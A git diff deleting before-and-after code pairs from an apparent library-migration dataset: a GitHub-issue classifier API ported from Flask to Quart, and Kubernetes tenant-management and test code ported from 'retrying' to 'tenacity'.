b/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.source.py deleted file mode 100644 index c6b2076..0000000 --- a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.source.py +++ /dev/null @@ -1,55 +0,0 @@ -#!usr/bin/env python -# -# Copyright (c) 2019 Intel Corporation -# -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -"""a rest api for github issue classification""" -import flask -from flask_cors import CORS -from infer import infer - -app = flask.Flask("github issue classifier") -CORS(app) - -banner = {"what": "github issue classifier", - "usage": { - "client": "curl -i -X POST -d '{'issue':'use experimental_jit_scope to enable XLA:CPU.' 
}' http://localhost:5059/github_issues/infer", - "server": "docker run -d -p 5000:5000 stacks_img_recog" - } - } - - -@app.route('/github_issues/', methods=["GET"]) -def index(): - return flask.jsonify(banner), 201 - - -@app.route('/github_issues/infer', methods=["POST"]) -def pred(): - issue = list() - issue.append(flask.request.json["issue"]) - if not flask.request.json or not "issue" in flask.request.json: - flask.abort(400) - labels = infer(issue) - return flask.jsonify({"label": labels}), 201 - - -@app.errorhandler(404) -def not_found(error): - return flask.make_response(flask.jsonify({"error": "Not found"}), 404) - - -if __name__ == "__main__": - app.run(host="0.0.0.0", port=5059) diff --git a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.target.py b/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.target.py deleted file mode 100644 index 6a295e4..0000000 --- a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.target.py +++ /dev/null @@ -1,62 +0,0 @@ -#!usr/bin/env python -# -# Copyright (c) 2019 Intel Corporation -# -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -"""a rest api for github issue classification""" -import quart - -from quart import Quart -from quart_cors import cors - -from infer import infer - - -app = Quart(__name__) -cors(app) - -banner = { - "what": "github issue classifier", - "usage": { - "client": "curl -i -X POST -d '{'issue':'use experimental_jit_scope to enable XLA:CPU.' 
}' http://localhost:5059/github_issues/infer", - "server": "docker run -d -p 5000:5000 stacks_img_recog", - }, -} - - -@app.route("/", methods=["get"]) -@app.route("/index", methods=["get"]) -@app.route("/github_issues", methods=["get"]) -async def index(): - return quart.jsonify(banner), 201 - - -@app.route("/github_issues/infer", methods=["POST"]) -async def pred(): - issue = list() - issue.append(quart.request.json["issue"]) - if not quart.request.json or not "issue" in quart.request.json: - quart.abort(400) - labels = infer(issue) - return quart.jsonify({"label": labels}), 201 - - -@app.errorhandler(404) -async def not_found(error): - return quart.make_response(quart.jsonify({"error": "Not found"}), 404) - - -if __name__ == "__main__": - app.run(host="0.0.0.0", port=5059) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.diff b/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.diff deleted file mode 100644 index e0bc056..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.diff +++ /dev/null @@ -1,32 +0,0 @@ -diff --git a/management/management_api/tenants/tenants_utils.py b/management/management_api/tenants/tenants_utils.py - index 8c3944c099639b4871ece3273b9727f2427474e0..71aff3a0bd1ae2a7d7d91858dcbe721de152693e 100644 - --- a/management/management_api/tenants/tenants_utils.py - +++ b/management/management_api/tenants/tenants_utils.py -@@ -2,8 +2,7 @@ import falcon - from botocore.exceptions import ClientError - from kubernetes import client - from kubernetes.client.rest import ApiException --from retrying import retry -- -+from tenacity import retry, stop_after_attempt, wait_fixed - from management_api.config import CERT_SECRET_NAME, PORTABLE_SECRETS_PATHS, \ - minio_client, minio_resource, RESOURCE_DOES_NOT_EXIST, \ - NAMESPACE_BEING_DELETED, NO_SUCH_BUCKET_EXCEPTION, TERMINATION_IN_PROGRESS -@@ -106,7 +105,7 @@ def create_resource_quota(name, quota): - return response - - --@retry(stop_max_attempt_number=5, wait_fixed=2000) -+@retry(stop=stop_after_attempt(5), wait=wait_fixed(2)) - def delete_bucket(name): - response = 'Bucket {} does not exist'.format(name) - existed = True -@@ -126,7 +125,7 @@ def delete_bucket(name): - return response - - --@retry(stop_max_attempt_number=5, wait_fixed=2000) -+@retry(stop=stop_after_attempt(3), wait=wait_fixed(2)) - def delete_namespace(name): - body = client.V1DeleteOptions() - response = 'Namespace {} does not exist'.format(name) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.source.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.source.py deleted file mode 100644 index d75de19..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.source.py +++ /dev/null @@ -1,256 +0,0 @@ -import falcon -from botocore.exceptions import ClientError -from kubernetes import client -from kubernetes.client.rest import ApiException -from retrying import retry - -from management_api.config import CERT_SECRET_NAME, PORTABLE_SECRETS_PATHS, \ - minio_client, minio_resource, RESOURCE_DOES_NOT_EXIST, \ - NAMESPACE_BEING_DELETED, NO_SUCH_BUCKET_EXCEPTION, TERMINATION_IN_PROGRESS -from management_api.utils.cert import validate_cert -from 
management_api.utils.errors_handling import TenantAlreadyExistsException, MinioCallException, \ - TenantDoesNotExistException, KubernetesCreateException, KubernetesDeleteException, \ - KubernetesGetException -from management_api.utils.kubernetes_resources import get_k8s_api_client, get_k8s_rbac_api_client -from management_api.utils.logger import get_logger - -logger = get_logger(__name__) - - -def create_tenant(parameters): - name = parameters['name'] - cert = parameters['cert'] - scope = parameters['scope'] - quota = parameters['quota'] - - logger.info('Creating new tenant: {}' - .format(name, cert, scope, quota)) - - validate_cert(cert) - - if tenant_exists(name): - raise TenantAlreadyExistsException(name) - - try: - create_namespace(name, quota) - propagate_portable_secrets(target_namespace=name) - create_bucket(name) - create_secret(name, cert) - create_resource_quota(name, quota) - create_role(name) - create_rolebinding(name, scope) - except falcon.HTTPError: - delete_namespace(name) - delete_bucket(name) - raise - - logger.info('Tenant {} created'.format(name)) - return name - - -def create_namespace(name, quota): - if 'maxEndpoints' in quota: - name_object = client.\ - V1ObjectMeta(name=name, annotations={'maxEndpoints': str(quota.pop('maxEndpoints'))}) - else: - name_object = client.V1ObjectMeta(name=name) - namespace = client.V1Namespace(metadata=name_object) - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespace(namespace) - except ApiException as apiException: - raise KubernetesCreateException('namespace', apiException) - - logger.info("Namespace {} created".format(name)) - return response - - -def create_bucket(name): - try: - response = minio_client.create_bucket(Bucket=name) - except ClientError as clientError: - raise MinioCallException('An error occurred during bucket creation: {}'.format(clientError)) - - logger.info('Bucket created: {}'.format(response)) - return response - - -def create_secret(name, cert): - cert_secret_metadata = client.V1ObjectMeta(name=CERT_SECRET_NAME) - cert_secret_data = {"ca.crt": cert} - cert_secret = client.V1Secret(api_version="v1", data=cert_secret_data, - kind="Secret", metadata=cert_secret_metadata, - type="Opaque") - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespaced_secret(namespace=name, - body=cert_secret) - except ApiException as apiException: - raise KubernetesCreateException('secret', apiException) - - logger.info('Secret {} created'.format(CERT_SECRET_NAME)) - return response - - -def create_resource_quota(name, quota): - name_object = client.V1ObjectMeta(name=name) - resource_quota_spec = client.V1ResourceQuotaSpec(hard=quota) - body = client.V1ResourceQuota(spec=resource_quota_spec, metadata=name_object) - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespaced_resource_quota(name, body) - except ApiException as apiException: - raise KubernetesCreateException('resource_quota', apiException) - - logger.info("Resource quota {} created".format(quota)) - return response - - -@retry(stop_max_attempt_number=5, wait_fixed=2000) -def delete_bucket(name): - response = 'Bucket {} does not exist'.format(name) - existed = True - try: - bucket = minio_resource.Bucket(name) - bucket.objects.all().delete() - response = bucket.delete() - except ClientError as clientError: - if clientError.response['Error']['Code'] != NO_SUCH_BUCKET_EXCEPTION: - raise MinioCallException("A error occurred during bucket deletion: {}" - .format(clientError)) - existed = 
False - if existed: - logger.info('Bucket {} deleted'.format(name)) - else: - logger.info('Bucket {} does not exist'.format(name)) - return response - - -@retry(stop_max_attempt_number=5, wait_fixed=2000) -def delete_namespace(name): - body = client.V1DeleteOptions() - response = 'Namespace {} does not exist'.format(name) - api_instance = get_k8s_api_client() - existed = True - try: - response = api_instance.delete_namespace(name, body) - except ApiException as apiException: - if apiException.status != RESOURCE_DOES_NOT_EXIST and \ - apiException.status != NAMESPACE_BEING_DELETED: - raise KubernetesDeleteException('namespace', apiException) - existed = False - if existed: - logger.info('Namespace {} deleted'.format(name)) - else: - logger.info('Namespace {} does not exist'.format(name)) - - return response - - -def delete_tenant(parameters): - name = parameters['name'] - logger.info('Deleting tenant: {}'.format(name)) - if tenant_exists(name): - delete_bucket(name) - delete_namespace(name) - logger.info('Tenant {} deleted'.format(name)) - else: - raise TenantDoesNotExistException(name) - return name - - -def propagate_secret(source_secret_path, target_namespace): - source_secret_namespace, source_secret_name = source_secret_path.split('/') - api_instance = get_k8s_api_client() - try: - source_secret = api_instance.read_namespaced_secret( - source_secret_name, source_secret_namespace) - except ApiException as apiException: - raise KubernetesGetException('secret', apiException) - - source_secret.metadata.namespace = target_namespace - source_secret.metadata.resource_version = None - - try: - api_instance.create_namespaced_secret(namespace=target_namespace, - body=source_secret) - except ApiException as apiException: - raise KubernetesCreateException('secret', apiException) - - -def propagate_portable_secrets(target_namespace): - for portable_secret_path in PORTABLE_SECRETS_PATHS: - propagate_secret(portable_secret_path, target_namespace) - logger.info('Portable secrets copied from default to {}'.format(target_namespace)) - - -def does_bucket_exist(bucket_name): - try: - minio_client.list_objects_v2(Bucket=bucket_name) - except ClientError as clientError: - error_code = clientError.response['Error']['Code'] - if error_code == NO_SUCH_BUCKET_EXCEPTION: - return False - raise MinioCallException("Error accessing bucket: {}".format(clientError)) - return True - - -def is_namespace_available(namespace): - response = None - api_instance = get_k8s_api_client() - try: - response = api_instance.read_namespace_status(namespace) - except ApiException as apiException: - if apiException.status == RESOURCE_DOES_NOT_EXIST: - return False - raise KubernetesGetException('namespace status', apiException) - if response and response.status.phase == TERMINATION_IN_PROGRESS: - return False - return True - - -def tenant_exists(tenant_name): - result = does_bucket_exist(tenant_name) and is_namespace_available(tenant_name) - logger.info("Tenant already exists: " + str(result)) - return result - - -def create_role(name): - api_version = 'rbac.authorization.k8s.io/v1' - meta = client.V1ObjectMeta(name=name, namespace=name) - service_rules = client.V1PolicyRule(api_groups=[""], resources=["services"], - verbs=["create", "list", "get", "delete"]) - ingress_rules = client.V1PolicyRule(api_groups=[""], resources=["ingresses"], - verbs=["create", "list", "get", "delete"]) - deployment_rules = client.V1PolicyRule(api_groups=[""], resources=["deployments"], - verbs=["create", "list", "get", "delete"]) - server_rules = 
client.V1PolicyRule(api_groups=["aipg.intel.com"], resources=["servers"], - verbs=["create", "get", "delete", "patch"]) - role = client.V1Role(api_version=api_version, metadata=meta, - rules=[service_rules, ingress_rules, deployment_rules, server_rules]) - rbac_api_instance = get_k8s_rbac_api_client() - try: - response = rbac_api_instance.create_namespaced_role(name, role) - except ApiException as apiException: - raise KubernetesCreateException('role', apiException) - - logger.info("Role {} created".format(name)) - return response - - -def create_rolebinding(name, scope_name): - api_version = 'rbac.authorization.k8s.io' - scope = 'oidc:/' + scope_name - subject = client.V1Subject(kind='Group', name=scope, namespace=name) - role_ref = client.V1RoleRef(api_group=api_version, kind='Role', name=name) - meta = client.V1ObjectMeta(name=name, namespace=name) - rolebinding = client.V1RoleBinding(metadata=meta, role_ref=role_ref, subjects=[subject]) - rbac_api_instance = get_k8s_rbac_api_client() - - try: - response = rbac_api_instance.create_namespaced_role_binding(name, rolebinding) - except ApiException as apiException: - KubernetesCreateException('rolebinding', apiException) - - logger.info("Rolebinding {} created".format(name)) - return response diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.target.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.target.py deleted file mode 100644 index a6de637..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.target.py +++ /dev/null @@ -1,255 +0,0 @@ -import falcon -from botocore.exceptions import ClientError -from kubernetes import client -from kubernetes.client.rest import ApiException -from tenacity import retry, stop_after_attempt, wait_fixed -from management_api.config import CERT_SECRET_NAME, PORTABLE_SECRETS_PATHS, \ - minio_client, minio_resource, RESOURCE_DOES_NOT_EXIST, \ - NAMESPACE_BEING_DELETED, NO_SUCH_BUCKET_EXCEPTION, TERMINATION_IN_PROGRESS -from management_api.utils.cert import validate_cert -from management_api.utils.errors_handling import TenantAlreadyExistsException, MinioCallException, \ - TenantDoesNotExistException, KubernetesCreateException, KubernetesDeleteException, \ - KubernetesGetException -from management_api.utils.kubernetes_resources import get_k8s_api_client, get_k8s_rbac_api_client -from management_api.utils.logger import get_logger - -logger = get_logger(__name__) - - -def create_tenant(parameters): - name = parameters['name'] - cert = parameters['cert'] - scope = parameters['scope'] - quota = parameters['quota'] - - logger.info('Creating new tenant: {}' - .format(name, cert, scope, quota)) - - validate_cert(cert) - - if tenant_exists(name): - raise TenantAlreadyExistsException(name) - - try: - create_namespace(name, quota) - propagate_portable_secrets(target_namespace=name) - create_bucket(name) - create_secret(name, cert) - create_resource_quota(name, quota) - create_role(name) - create_rolebinding(name, scope) - except falcon.HTTPError: - delete_namespace(name) - delete_bucket(name) - raise - - logger.info('Tenant {} created'.format(name)) - return name - - -def create_namespace(name, quota): - if 'maxEndpoints' in quota: - name_object = client.\ - V1ObjectMeta(name=name, annotations={'maxEndpoints': str(quota.pop('maxEndpoints'))}) - else: - name_object = client.V1ObjectMeta(name=name) - namespace = 
client.V1Namespace(metadata=name_object) - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespace(namespace) - except ApiException as apiException: - raise KubernetesCreateException('namespace', apiException) - - logger.info("Namespace {} created".format(name)) - return response - - -def create_bucket(name): - try: - response = minio_client.create_bucket(Bucket=name) - except ClientError as clientError: - raise MinioCallException('An error occurred during bucket creation: {}'.format(clientError)) - - logger.info('Bucket created: {}'.format(response)) - return response - - -def create_secret(name, cert): - cert_secret_metadata = client.V1ObjectMeta(name=CERT_SECRET_NAME) - cert_secret_data = {"ca.crt": cert} - cert_secret = client.V1Secret(api_version="v1", data=cert_secret_data, - kind="Secret", metadata=cert_secret_metadata, - type="Opaque") - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespaced_secret(namespace=name, - body=cert_secret) - except ApiException as apiException: - raise KubernetesCreateException('secret', apiException) - - logger.info('Secret {} created'.format(CERT_SECRET_NAME)) - return response - - -def create_resource_quota(name, quota): - name_object = client.V1ObjectMeta(name=name) - resource_quota_spec = client.V1ResourceQuotaSpec(hard=quota) - body = client.V1ResourceQuota(spec=resource_quota_spec, metadata=name_object) - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespaced_resource_quota(name, body) - except ApiException as apiException: - raise KubernetesCreateException('resource_quota', apiException) - - logger.info("Resource quota {} created".format(quota)) - return response - - -@retry(stop=stop_after_attempt(5), wait=wait_fixed(2)) -def delete_bucket(name): - response = 'Bucket {} does not exist'.format(name) - existed = True - try: - bucket = minio_resource.Bucket(name) - bucket.objects.all().delete() - response = bucket.delete() - except ClientError as clientError: - if clientError.response['Error']['Code'] != NO_SUCH_BUCKET_EXCEPTION: - raise MinioCallException("A error occurred during bucket deletion: {}" - .format(clientError)) - existed = False - if existed: - logger.info('Bucket {} deleted'.format(name)) - else: - logger.info('Bucket {} does not exist'.format(name)) - return response - - -@retry(stop=stop_after_attempt(3), wait=wait_fixed(2)) -def delete_namespace(name): - body = client.V1DeleteOptions() - response = 'Namespace {} does not exist'.format(name) - api_instance = get_k8s_api_client() - existed = True - try: - response = api_instance.delete_namespace(name, body) - except ApiException as apiException: - if apiException.status != RESOURCE_DOES_NOT_EXIST and \ - apiException.status != NAMESPACE_BEING_DELETED: - raise KubernetesDeleteException('namespace', apiException) - existed = False - if existed: - logger.info('Namespace {} deleted'.format(name)) - else: - logger.info('Namespace {} does not exist'.format(name)) - - return response - - -def delete_tenant(parameters): - name = parameters['name'] - logger.info('Deleting tenant: {}'.format(name)) - if tenant_exists(name): - delete_bucket(name) - delete_namespace(name) - logger.info('Tenant {} deleted'.format(name)) - else: - raise TenantDoesNotExistException(name) - return name - - -def propagate_secret(source_secret_path, target_namespace): - source_secret_namespace, source_secret_name = source_secret_path.split('/') - api_instance = get_k8s_api_client() - try: - source_secret = 
api_instance.read_namespaced_secret( - source_secret_name, source_secret_namespace) - except ApiException as apiException: - raise KubernetesGetException('secret', apiException) - - source_secret.metadata.namespace = target_namespace - source_secret.metadata.resource_version = None - - try: - api_instance.create_namespaced_secret(namespace=target_namespace, - body=source_secret) - except ApiException as apiException: - raise KubernetesCreateException('secret', apiException) - - -def propagate_portable_secrets(target_namespace): - for portable_secret_path in PORTABLE_SECRETS_PATHS: - propagate_secret(portable_secret_path, target_namespace) - logger.info('Portable secrets copied from default to {}'.format(target_namespace)) - - -def does_bucket_exist(bucket_name): - try: - minio_client.list_objects_v2(Bucket=bucket_name) - except ClientError as clientError: - error_code = clientError.response['Error']['Code'] - if error_code == NO_SUCH_BUCKET_EXCEPTION: - return False - raise MinioCallException("Error accessing bucket: {}".format(clientError)) - return True - - -def is_namespace_available(namespace): - response = None - api_instance = get_k8s_api_client() - try: - response = api_instance.read_namespace_status(namespace) - except ApiException as apiException: - if apiException.status == RESOURCE_DOES_NOT_EXIST: - return False - raise KubernetesGetException('namespace status', apiException) - if response and response.status.phase == TERMINATION_IN_PROGRESS: - return False - return True - - -def tenant_exists(tenant_name): - result = does_bucket_exist(tenant_name) and is_namespace_available(tenant_name) - logger.info("Tenant already exists: " + str(result)) - return result - - -def create_role(name): - api_version = 'rbac.authorization.k8s.io/v1' - meta = client.V1ObjectMeta(name=name, namespace=name) - service_rules = client.V1PolicyRule(api_groups=[""], resources=["services"], - verbs=["create", "list", "get", "delete"]) - ingress_rules = client.V1PolicyRule(api_groups=[""], resources=["ingresses"], - verbs=["create", "list", "get", "delete"]) - deployment_rules = client.V1PolicyRule(api_groups=[""], resources=["deployments"], - verbs=["create", "list", "get", "delete"]) - server_rules = client.V1PolicyRule(api_groups=["aipg.intel.com"], resources=["servers"], - verbs=["create", "get", "delete", "patch"]) - role = client.V1Role(api_version=api_version, metadata=meta, - rules=[service_rules, ingress_rules, deployment_rules, server_rules]) - rbac_api_instance = get_k8s_rbac_api_client() - try: - response = rbac_api_instance.create_namespaced_role(name, role) - except ApiException as apiException: - raise KubernetesCreateException('role', apiException) - - logger.info("Role {} created".format(name)) - return response - - -def create_rolebinding(name, scope_name): - api_version = 'rbac.authorization.k8s.io' - scope = 'oidc:/' + scope_name - subject = client.V1Subject(kind='Group', name=scope, namespace=name) - role_ref = client.V1RoleRef(api_group=api_version, kind='Role', name=name) - meta = client.V1ObjectMeta(name=name, namespace=name) - rolebinding = client.V1RoleBinding(metadata=meta, role_ref=role_ref, subjects=[subject]) - rbac_api_instance = get_k8s_rbac_api_client() - - try: - response = rbac_api_instance.create_namespaced_role_binding(name, rolebinding) - except ApiException as apiException: - KubernetesCreateException('rolebinding', apiException) - - logger.info("Rolebinding {} created".format(name)) - return response diff --git 
a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.diff b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.diff deleted file mode 100644 index 54d7dc4..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/tests/conftest.py b/tests/conftest.py - index 8c3944c099639b4871ece3273b9727f2427474e0..71aff3a0bd1ae2a7d7d91858dcbe721de152693e 100644 - --- a/tests/conftest.py - +++ b/tests/conftest.py -@@ -1,7 +1,7 @@ - import boto3 - import pytest - import requests --from retrying import retry -+from tenacity import retry, stop_after_attempt, wait_fixed - from bs4 import BeautifulSoup - from botocore.client import Config - from kubernetes import config, client -@@ -117,7 +117,7 @@ def tenant_with_endpoint(function_context, tenant, get_k8s_custom_obj_client): - return namespace, body - - --@retry(stop_max_attempt_number=3, wait_fixed=200) -+@retry(stop=stop_after_attempt(3), wait=wait_fixed(0.2)) - def get_all_pods_in_namespace(k8s_client, namespace, label_selector=''): - try: - api_response = k8s_client.list_namespaced_pod(namespace=namespace, diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.source.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.source.py deleted file mode 100644 index 37fa655..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.source.py +++ /dev/null @@ -1,199 +0,0 @@ -import boto3 -import pytest -import requests -from retrying import retry -from bs4 import BeautifulSoup -from botocore.client import Config -from kubernetes import config, client -from kubernetes.client.rest import ApiException -from urllib.parse import urljoin, urlparse, parse_qs - -from management_api_tests.config import MINIO_SECRET_ACCESS_KEY, MINIO_ACCESS_KEY_ID, \ - MINIO_REGION, MINIO_ENDPOINT_ADDR, SIGNATURE_VERSION, CRD_VERSION, CRD_PLURAL, CRD_KIND, \ - CRD_GROUP, CRD_API_VERSION, TENANT_NAME, TENANT_RESOURCES, ENDPOINT_RESOURCES, \ - AUTH_MANAGEMENT_API_URL, JANE -from management_api_tests.context import Context -from management_api_tests.reused import propagate_portable_secrets, transform_quota - - -@pytest.fixture(scope="session") -def configuration(): - return config.load_kube_config() - - -@pytest.fixture(scope="session") -def api_instance(configuration): - return client.CoreV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def rbac_api_instance(configuration): - return client.RbacAuthorizationV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def apps_api_instance(configuration): - return client.AppsV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def get_k8s_custom_obj_client(configuration): - return client.CustomObjectsApi(client.ApiClient(configuration)) - - -@pytest.fixture(scope="function") -def auth_code_for_jane(): - response = requests.get(AUTH_MANAGEMENT_API_URL, allow_redirects=False) - auth_dex_url = response.headers['location'] - parsed_url = urlparse(auth_dex_url) - dex_base_url = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_url) - - resp = requests.get(auth_dex_url, verify=False) - soup = BeautifulSoup(resp.text, 'html.parser') - login_form_action = urljoin(dex_base_url, soup.form['action']) - - data = JANE - resp = requests.post(login_form_action, data=data, allow_redirects=False, verify=False) - - resp = requests.get(urljoin(dex_base_url, 
resp.headers['Location']), allow_redirects=False, - verify=False) - query = urlparse(resp.headers['Location']).query - auth_code = parse_qs(query)['code'][0] - - return auth_code - - -@pytest.fixture(scope="function") -def function_context(request, get_k8s_custom_obj_client, api_instance, minio_resource, - minio_client): - context = Context(k8s_client=api_instance, k8s_client_custom=get_k8s_custom_obj_client, - minio_resource_client=minio_resource, minio_client=minio_client) - request.addfinalizer(context.delete_all_objects) - return context - - -@pytest.fixture(scope="session") -def minio_client(): - return boto3.client('s3', - endpoint_url=MINIO_ENDPOINT_ADDR, - aws_access_key_id=MINIO_ACCESS_KEY_ID, - aws_secret_access_key=MINIO_SECRET_ACCESS_KEY, - config=Config( - signature_version=SIGNATURE_VERSION), - region_name=MINIO_REGION) - - -@pytest.fixture(scope="session") -def minio_resource(): - return boto3.resource('s3', - endpoint_url=MINIO_ENDPOINT_ADDR, - aws_access_key_id=MINIO_ACCESS_KEY_ID, - aws_secret_access_key=MINIO_SECRET_ACCESS_KEY, - config=Config( - signature_version=SIGNATURE_VERSION), - region_name=MINIO_REGION) - - -@pytest.fixture(scope="function") -def tenant_with_endpoint(function_context, tenant, get_k8s_custom_obj_client): - namespace, _ = tenant - metadata = {"name": "predict"} - resources = transform_quota(ENDPOINT_RESOURCES) - model_name, model_version = 'resnet', 1 - spec = { - 'modelName': model_name, - 'modelVersion': model_version, - 'endpointName': 'predict', - 'subjectName': 'client', - 'replicas': 1, - 'resources': resources - } - body = {"spec": spec, 'kind': CRD_KIND, "replicas": 1, - "apiVersion": CRD_API_VERSION, "metadata": metadata} - get_k8s_custom_obj_client. \ - create_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, body) - object_to_delete = {'name': "predict", 'namespace': namespace} - function_context.add_object(object_type='CRD', object_to_delete=object_to_delete) - return namespace, body - - -@retry(stop_max_attempt_number=3, wait_fixed=200) -def get_all_pods_in_namespace(k8s_client, namespace, label_selector=''): - try: - api_response = k8s_client.list_namespaced_pod(namespace=namespace, - label_selector=label_selector) - except ApiException as e: - print("Exception when calling CoreV1Api->list_pod_for_all_namespaces: %s\n" % e) - - return api_response - - -def resource_quota(api_instance, quota={}, namespace=TENANT_NAME): - name_object = client.V1ObjectMeta(name=namespace) - resource_quota_spec = client.V1ResourceQuotaSpec(hard=quota) - body = client.V1ResourceQuota(spec=resource_quota_spec, metadata=name_object) - api_instance.create_namespaced_resource_quota(namespace=namespace, body=body) - return quota - - -@pytest.fixture(scope="function") -def tenant(api_instance, minio_client, function_context): - name = TENANT_NAME - name_object = client.V1ObjectMeta(name=name) - namespace = client.V1Namespace(metadata=name_object) - api_instance.create_namespace(namespace) - propagate_portable_secrets(api_instance, name) - quota = resource_quota(api_instance, quota=TENANT_RESOURCES) - minio_client.create_bucket(Bucket=name) - function_context.add_object(object_type='tenant', object_to_delete={'name': name}) - return name, quota - - -@pytest.fixture(scope="session") -def fake_tenant(): - name = "andrzej" # USER1_HEADERS contain token for andrzej user with scope andrzej - quota = {} - return name, quota - - -@pytest.fixture(scope="function") -def empty_tenant(tenant): - return create_dummy_tenant(tenant) - - 
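# The conftest hunk above maps retrying's flat keyword arguments onto
# tenacity's strategy objects; note the unit change, since retrying's
# wait_fixed is in milliseconds while tenacity's is in seconds (200 -> 0.2).
# A minimal sketch of the mapping, assuming only that tenacity is installed;
# fetch_with_retries is an illustrative name, not part of the dataset:

from tenacity import retry, stop_after_attempt, wait_fixed

# retrying:  @retry(stop_max_attempt_number=3, wait_fixed=200)   # 200 ms
@retry(stop=stop_after_attempt(3), wait=wait_fixed(0.2))         # 0.2 s
def fetch_with_retries():
    """Re-run the body up to 3 times, pausing 0.2 s between attempts."""
    ...  # the flaky call being retried goes here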
-@pytest.fixture(scope="function") -def fake_tenant_endpoint(fake_tenant): - return create_dummy_tenant(fake_tenant) - - -def create_dummy_tenant(tenant): - name, _ = tenant - body = {} - return name, body - - -@pytest.fixture(scope="function") -def fake_endpoint(tenant): - namespace, _ = tenant - model_name, model_version = 'fake', 1 - body = {'spec': {'modelName': model_name, - 'modelVersion': model_version}} - return namespace, body - - -def create_empty_model(endpoint, minio_client): - namespace, body = endpoint - model_name, model_version = body['spec']['modelName'], body['spec']['modelVersion'] - model_path = f'{model_name}-{model_version}/' - minio_client.put_object(Bucket=namespace, Body='', Key=model_path) - return namespace, body - - -@pytest.fixture(scope="function") -def endpoint_with_empty_model(tenant_with_endpoint, minio_client): - return create_empty_model(tenant_with_endpoint, minio_client) - - -@pytest.fixture(scope="function") -def fake_endpoint_with_empty_model(fake_endpoint, minio_client): - return create_empty_model(fake_endpoint, minio_client) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.target.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.target.py deleted file mode 100644 index 903370c..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.target.py +++ /dev/null @@ -1,199 +0,0 @@ -import boto3 -import pytest -import requests -from tenacity import retry, stop_after_attempt, wait_fixed -from bs4 import BeautifulSoup -from botocore.client import Config -from kubernetes import config, client -from kubernetes.client.rest import ApiException -from urllib.parse import urljoin, urlparse, parse_qs - -from management_api_tests.config import MINIO_SECRET_ACCESS_KEY, MINIO_ACCESS_KEY_ID, \ - MINIO_REGION, MINIO_ENDPOINT_ADDR, SIGNATURE_VERSION, CRD_VERSION, CRD_PLURAL, CRD_KIND, \ - CRD_GROUP, CRD_API_VERSION, TENANT_NAME, TENANT_RESOURCES, ENDPOINT_RESOURCES, \ - AUTH_MANAGEMENT_API_URL, JANE -from management_api_tests.context import Context -from management_api_tests.reused import propagate_portable_secrets, transform_quota - - -@pytest.fixture(scope="session") -def configuration(): - return config.load_kube_config() - - -@pytest.fixture(scope="session") -def api_instance(configuration): - return client.CoreV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def rbac_api_instance(configuration): - return client.RbacAuthorizationV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def apps_api_instance(configuration): - return client.AppsV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def get_k8s_custom_obj_client(configuration): - return client.CustomObjectsApi(client.ApiClient(configuration)) - - -@pytest.fixture(scope="function") -def auth_code_for_jane(): - response = requests.get(AUTH_MANAGEMENT_API_URL, allow_redirects=False) - auth_dex_url = response.headers['location'] - parsed_url = urlparse(auth_dex_url) - dex_base_url = 